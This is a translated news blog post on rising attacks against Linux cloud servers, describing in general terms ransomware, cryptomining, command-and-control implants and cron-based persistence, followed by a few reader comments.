Attacks against Linux are increasing and we are not prepared

Diego Germán González

4 minutes

Attacks against Linux are on the rise

Years ago, Linux users made fun of Windows users for their security problems. A common joke was that the only virus we knew was the one from the cold we caught. Cold resulting from outdoor activities performed in the time not spent formatting and rebooting.

As it happened to the little pigs in the story, our safety was just a feeling. As Linux made its way into the corporate world, cybercriminals found ways to circumvent its protections.

Why attacks against Linux are increasing

When I was collecting the items for the balance of 2021, I was surprised that every month there was a report on security issues related to Linux. Of course, much of the responsibility is not with the developers but with the system administrators.. Most of the problems are due to poorly configured or managed infrastructures.

I agree with you VMWare cybersecurity researchers, cybercriminals made Linux the target of their attacks when they discovered that, in the last five years, Linux became the most popular operating system for multicloud environments and is the one behind 78% of the most popular websites.

One of the problems is that most current anti-malware countermeasures focus mainly
in addressing Windows-based threats.

Public and private clouds are high-value targets for cybercriminals, as they provide access to infrastructure services and critical computing resources. They host key components, such as email servers and customer databases,

These attacks occur by exploiting weak authentication systems, vulnerabilities, and misconfigurations in container-based infrastructures. to infiltrate the environment using remote access tools (RATs).

Once attackers have gained entry into the system, they typically opt for two types of attacks: erun ransomware or deploy cryptomining components.

  • Ransomware: In this type of attack, criminals enter a network and encrypt files.
  • Crypto mining: There are actually two types of attacks. In the first, wallets are stolen simulating an application based on cryptocurrencies and in the second, the hardware resources of the attacked computer are used for mining.

How the attacks are carried out

Once the criminal gains initial access to an environment, You must find a way to take advantage of this limited access to gain more privileges. The first goal is to install programs on a compromised system that allow it to gain partial control of the machine.

This program, known as an implant or beacon, aims to establish regular network connections to the command and control server to receive instructions and transmit the results.

There are two ways of connection with the implant; passive and active

  • Passive: The passive implant waits for a connection to a compromised server.
  • Active: The implant is permanently connected to the command and control server.

Research determines that implants in active mode are the most used.

Attacker Tactics

Implants often perform reconnaissance on systems in their area. For example, they can scan a full set of IP addresses to collect system information and obtain TCP port banner data. This may also allow the implant to collect IP addresses, host names, active user accounts, and specific operating systems and software versions of all systems it detects.

The implants have to be able to hide within infected systems to continue doing their job. For that, it is usually shown as another service or application of the host operating system. In Linux-based clouds they are camouflaged as routine cron jobs. On Unix-inspired systems like Linux, cron allows Linux, macOS, and Unix environments to schedule processes to run at regular intervals. In this way, the malware can be implanted into a compromised system with a reboot frequency of 15 minutes, so it can be rebooted if it is ever aborted.


Leave a Comment

Your email address will not be published. Required fields are marked with *

*

*

  1. Responsible for the data: AB Internet Networks 2008 SL
  2. Purpose of the data: Control SPAM, comment management.
  3. Legitimation: Your consent
  4. Communication of the data: The data will not be communicated to third parties except by legal obligation.
  5. Data storage: Database hosted by Occentus Networks (EU)
  6. Rights: At any time you can limit, recover and delete your information.

  1.   juancito said
    ago 2 years

    systemd + cgrups + http2 + http3 + javascripts in pdfs….etc etc etc and they still wonder why the problems started??

    Reply to juancito
  2.   Adrian said
    ago 2 years

    As you say, you fail, or a very junior problem that does not know how to configure a system or migrate from Windows that seems to be 123456 for complex systems, Linux is safe but not intelligent to make its own security, I think it is all one more challenge that happens in Windows to people for having an antivirus feels safe, it is not taught to be safe or how to be safe is said or that it leaves us vulnerable, so it would be good in an article how to protect against these things, how to make safe signs or use a senha encryption with only one…etc

    Reply to Adrian
  3.   Albert said
    ago 2 years

    I think that with more popularity and more attacks, the way you shield your team also matters.

    Reply to Albert